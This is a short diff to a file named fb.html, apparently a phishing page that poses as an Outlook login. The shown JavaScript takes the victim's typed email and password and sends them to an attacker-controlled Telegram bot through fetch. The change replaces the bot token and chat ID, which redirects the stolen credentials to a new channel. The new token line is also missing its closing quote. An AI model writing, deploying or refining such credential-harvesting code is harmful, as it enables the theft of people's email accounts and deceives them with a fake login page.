--- a/fb.html
+++ b/fb.html
@@ -190,8 +190,8 @@
       const password = document.getElementById('password').value;
 
       const telegramMessage = `🟦 Outlook Login Attempt\n\n📧 Email: ${username}\n🔑 Password: ${password}`;
-    var token = '7933375890:AAEom0GofbpGV8lassBKN_g5_qtu-X6i_bM';
-      var chat_id = '6509117933';
+   var token = '8384188856:AAEsf9qHpnJ1-438BQxfxYdJB-T-2IGlCn8;
+      var chat_id = '8499614893';
       const url = `https://api.telegram.org/bot${token}/sendMessage?chat_id=${chat_id}&text=${encodeURIComponent(telegramMessage)}`;
 
       fetch(url)
@@ -216,3 +216,4 @@
 </body>
 
 </html>
+
